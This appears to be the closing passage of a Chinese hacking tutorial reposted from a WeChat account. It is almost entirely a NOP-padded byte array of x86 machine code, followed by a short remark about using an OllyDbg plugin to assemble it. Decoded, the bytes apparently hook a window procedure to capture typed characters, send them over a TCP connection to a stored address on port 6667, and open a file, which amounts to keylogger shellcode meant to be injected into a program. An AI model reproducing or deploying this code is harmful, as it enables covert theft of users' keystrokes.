 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
 0x55,0x8B,0xEC,0x81,0xEC,0xC0,0x00,0x00,0x00,0x53,0x56,0x57,0x8D,0xBD,0x40,0xFF,
 0xFF,0xFF,0xC7,0xC1,0x30,0x00,0x00,0x00,0xC7,0xC0,0xCC,0xCC,0xCC,0xCC,0xF3,0xAB,
 0x8B,0x45,0x10,0x8B,0x58,0x04,0x81,0xFB,0x02,0x01,0x00,0x00,0x75,0x23,0x8A,0x40,
 0x08,0x88,0x05,0x00,0x10,0x4F,0x00,0x6A,0x00,0x6A,0x00,0x8D,0x05,0x00,0x10,0x4F,
 0x00,0x50,0x68,0xC0,0x03,0x4F,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,0x90,0x13,0x4F,
 0x00,0x8B,0x45,0x10,0x8B,0x58,0x04,0x81,0xFB,0x01,0x02,0x00,0x00,0x75,0x15,0x6A,
 0x00,0x6A,0x00,0x6A,0x00,0x68,0x80,0x04,0x4F,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,
 0x90,0x13,0x4F,0x00,0xFF,0x75,0x10,0xFF,0x75,0x0C,0xFF,0x75,0x08,0xFF,0x35,0x64,
 0x13,0x4F,0x00,0xFF,0x15,0x94,0x13,0x4F,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,
 0x0C,0x00,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
 0x55,0x8B,0xEC,0x83,0xEC,0x40,0x53,0x56,0x57,0x8D,0x85,0x30,0xFE,0xFF,0xFF,0x50,
 0x68,0x02,0x02,0x00,0x00,0xFF,0x15,0x98,0x13,0x4F,0x00,0x6A,0x00,0x6A,0x01,0x6A,
 0x02,0xFF,0x15,0x9C,0x13,0x4F,0x00,0x89,0x45,0xF8,0xC7,0xC0,0x02,0x00,0x00,0x00,
 0x66,0x89,0x45,0xE0,0x68,0x0B,0x1A,0x00,0x00,0xFF,0x15,0xA0,0x13,0x4F,0x00,0x66,
 0x89,0x45,0xE2,0x68,0x40,0x12,0x4F,0x00,0xFF,0x15,0xA4,0x13,0x4F,0x00,0x89,0x45,
 0xE4,0x6A,0x10,0x8D,0x45,0xE0,0x50,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xA8,0x13,0x4F,
 0x00,0x83,0xF8,0x00,0x75,0x11,0x6A,0x00,0x6A,0x01,0xFF,0x75,0x08,0x8B,0x45,0xF8,
 0x50,0xFF,0x15,0xAC,0x13,0x4F,0x00,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xB0,0x13,0x4F,
 0x00,0xFF,0x15,0xB4,0x13,0x4F,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00,
 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
 0x55,0x8B,0xEC,0x81,0xEC,0xC0,0x00,0x00,0x00,0x53,0x56,0x57,0x6A,0x00,0x68,0x80,
 0x00,0x00,0x00,0x6A,0x03,0x6A,0x00,0x6A,0x03,0x68,0x00,0x00,0x00,0xC0,0x68,0xB8,
 0x13,0x4F,0x00,0xFF,0x15,0x48,0x14,0x4F,0x00,0x6A,0x00,0x68,0x54,0x14,0x4F,0x00,
 0x6A,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x50,0xFF,0x15,0x4C,0x14,0x4F,
 0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00,0x90,0x90,0x90,0x90,0x90,0x90
};

Closing remarks:

It may read easily now, but there were a lot of tears behind it -。-、、、. Converting the assembly to machine code can be done with NonaWrite, a plugin for OllyDbg.

THE END

Originally published 2019-02-16; shared from the WeChat public account 黑客技术家园.